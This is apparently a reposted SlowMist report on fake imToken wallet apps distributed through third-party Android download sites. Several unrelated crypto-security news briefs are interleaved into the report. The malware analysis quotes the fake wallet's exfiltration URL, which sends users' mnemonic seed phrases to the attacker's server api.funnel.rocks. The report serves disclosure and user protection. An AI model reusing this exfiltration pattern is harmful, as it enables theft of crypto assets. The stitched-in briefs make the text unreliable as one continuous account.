TOKE:慢霧：Web3假錢包第三方源調查分析_KEN

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命，越來越多的人開始參與到這場加密浪潮中，但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林，身處Web3世界中，錢包則是進入Web3世界的入口以及通行證。當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中，你會發現在一條公鏈上每個應用都是使用錢包“登錄”；這與我們傳統意義上的“登錄”不同，在Web2世界中，每個應用之間的賬戶不全是互通的。但在Web3的世界中，所有應用都是統一使用錢包去進行“登錄”，我們可以看到“登錄”錢包時顯示的不是“LoginwithWallet”，取而代之的是“ConnectWallet”。而錢包是你在Web3世界中的唯一通行證。俗話說高樓之下必有陰影，在如此火熱的Web3世界里，錢包作為入口級應用，自然也被黑灰產業鏈盯上。

慢霧：針對macOS系統惡意軟件RustBucket竊取系統信息:金色財經報道，SlowMist發布安全警報，針對macOS 運行系統的 Rust 和 Objective-C 編寫的惡意軟件RustBucket，感染鏈由一個 macOS 安裝程序組成，該安裝程序安裝了一個帶后門但功能正常的 PDF 閱讀器。然后偽造的 PDF 閱讀器需要打開一個特定的 PDF 文件，該文件作為觸發惡意活動的密鑰。[2023/5/23 15:20:27]

在Android環境下，由于很多手機不支持GooglePlay或者因為網絡問題，很多人會從其他途徑下載GooglePlay的應用，比如：apkcombo、apkpure等第三方下載站，這些站點往往標榜自己App是從GooglePlay鏡像下載的，但是其真實安全性如何呢？網站分析

鑒于下載途徑眾多，我們今天以apkcombo為例看看，apkcombo是一個第三方應用市場，它提供的應用據官方說大部分來源于其他正規應用商店，但事實是否真如官方所說呢？我們先看下apkcombo的流量有多大：

慢霧：LendHub疑似被攻擊損失近600萬美金，1100枚ETH已轉移到Tornado Cash:金色財經報道，據慢霧區情報，HECO生態跨鏈借貸平臺LendHub疑似被攻擊，主要黑客獲利地址為0x9d01..ab03。黑客于1月12日從Tornado.Cash接收100ETH后，將部分資金跨鏈到Heco鏈展開攻擊后獲利，后使用多個平臺（如TransitSwap、Multichain、Uniswap、Curve和OptimismBridge）跨鏈或兌換被盜資金。截至目前，黑客已分11筆共轉1,100ETH到Tornado.Cash。被攻擊的具體原因尚待分析，慢霧安全團隊將持續跟進此事件。[2023/1/13 11:10:43]

據數據統計站點similarweb統計，apkcombo站點：全球排名：1,809國家排名：7,370品類排名：168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件，我們發現這款插件的用戶數達到了10W+：

慢霧：Gate官方Twitter賬戶被盜用，謹慎互動:10月22日消息，安全團隊慢霧發文稱：加密平臺Gate官方Twitter賬戶被盜用，謹慎互動。半小時前，攻擊者利用該賬戶發文，誘導用戶進入虛假網站連接錢包。此外，慢霧科技創始人余弦在社交媒體上發文表示：注意下，Gate官方推特應該是被黑了，發送了釣魚信息，這個網址 g?te[.]com 是假的（之前談過的 Punycode 字符有關的釣魚域名），如果你去Claim會出現eth_sign這種簽名釣魚，可能導致ETH等相關資產被盜。[2022/10/22 16:35:14]

那么回到我們關注的Web3領域中錢包方向，用戶如果從這里下載的錢包應用安全性如何？我們拿知名的imToken錢包為例，其GooglePlay的正規下載途徑為：https://play.google.com/store/apps/details?id=im.token.app

慢霧：Transit Swap事件中轉移到Tornado Cash的資金超過600萬美元:金色財經報道，慢霧 MistTrack 對 Transit Swap 事件資金轉移進行跟進分析，以下將分析結論同步社區：

Hacker#1 攻擊黑客（盜取最大資金黑客），獲利金額：約 2410 萬美元

1: 0x75F2...FFD46

2: 0xfa71...90fb

已歸還超 1890 萬美元的被盜資金；12,500 BNB 存款到 Tornado Cash；約 1400 萬 MOONEY 代幣和 67,709 DAI 代幣轉入 ShibaSwap: BONE Token 合約地址。

Hacker#2 套利機器人-1，獲利金額：1,166,882.07 BUSD

0xcfb0...7ac7(BSC)

保留在獲利地址中，未進一步轉移。

Hacker#3 攻擊模仿者-1，獲利金額：356,690.71 USDT

0x87be...3c4c(BSC)

Hacker#4 套利機器人-2，獲利金額：246,757.31 USDT

0x0000...4922(BSC)

已全部追回。

Hacker#5 套利機器人-3，獲利金額：584,801.17 USDC

0xcc3d...ae7d(BSC)

USDC 全部轉移至新地址 0x8960...8525，后無進一步轉移。

Hacker#6 攻擊模仿者-2，獲利金額：2,348,967.9 USDT

0x6e60...c5ea(BSC)

Hacker#7 套利機器人-4，獲利金額：5,974.52 UNI、1,667.36 MANA

0x6C6B...364e(ETH)

通過 Uniswap 兌換為 30.17 ETH，其中 0.71 支付給 Flashbots，剩余 ETH 未進一步轉移。[2022/10/6 18:41:10]

聲音 | 慢霧：EOS假充值紅色預警后續:慢霧安全團隊今早發布了 EOS 假充值紅色預警后，聯合 EOSPark 的大數據分析系統持續跟蹤和分析發現：從昨日開始，存在十幾個帳號利用這類攻擊技巧對數字貨幣交易所、錢包等平臺進行持續性攻擊，并有被真實攻擊情況。慢霧安全團隊在此建議各大交易所、錢包、DApp 做好相關防御措施，嚴格校驗發送給自己的轉賬交易在不可逆的狀態下確認交易的執行狀態是否為 executed。除此之外，確保以下幾點防止其他類型的“假充值”攻擊： 1. 判斷 action 是否為 transfer 2. 判斷合約賬號是否為 eosio.token 或其它 token 的官方合約 3. 判斷代幣名稱及精度 4. 判斷金額 5. 判斷 to 是否是自己平臺的充幣賬號。[2019/3/12]

由于很多手機不支持GooglePlay或者因為網絡問題，很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為：https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現，apkcombo提供的版本為24.9.11，經由imToken確認后，這是一個并不存在的版本！證實這是目前市面上假imToken錢包最多的一個版本。在編寫本文時imToken錢包的最新版本為2.11.3，此款錢包的版本號很高，顯然是為了偽裝成一個最新版本而設置的。如下圖，我們在apkcombo上發現，此假錢包版本顯示下載量較大，此處的下載量應該是爬取的GooglePlay的下載量信息，安全起見，我們覺得有必要披露這個惡意App的來源，防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如：uptodown下載地址：https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App，這導致釣魚的成本變得極低：

錢包分析

在之前我們已經分析過不少假錢包的案例，如：2021-11-24我們披露：《慢霧：假錢包App已致上萬人被盜，損失高達十三億美元》，所以在此不再贅述。我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析，在開始界面創建錢包或導入錢包助記詞時，虛假錢包會將助記詞等信息發送到釣魚網站的服務端去，如下圖：

根據逆向APK代碼和實際分析流量包發現，助記詞發送方式：https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖，最早的“api.funnel.rocks”證書出現在2022-06-03，也就是攻擊開始的大概時間：

俗話說一圖勝千言，最后我們畫一個流程圖：

總結

目前這種騙局活動不僅活躍，甚至有擴大范圍的趨勢，每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節，應時刻保持懷疑之心，增強安全意識與風險意識，當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證；如果你的錢包從上述鏡像站下載，請第一時間轉移資產并卸載該軟件，必要時可通過官方驗證通道核實。同時，如需使用錢包，請務必認準以下主流錢包App官方網址：1/imToken錢包：https://token.im/2/TokenPocket錢包：https://www.tokenpocket.pro/3/TronLink錢包：https://www.tronlink.org/4/比特派錢包：https://bitpie.com/5/MetaMask錢包：https://metamask.io/6/TrustWallet：https://trustwallet.com/請持續關注慢霧安全團隊，更多Web3安全風險分析與告警正在路上。致謝：感謝在溯源過程中imToken官方提供的驗證支持。由于保密性和隱私性，本文只是冰山一角。慢霧在此建議，用戶需加強對安全知識的了解，進一步強化甄別網絡釣魚攻擊的能力等，避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

Tags：COMTOKTOKEKENYINCOME幣imtoken為何被別人轉走Indorse Tokenimtoken官網下載2.0

Filecoin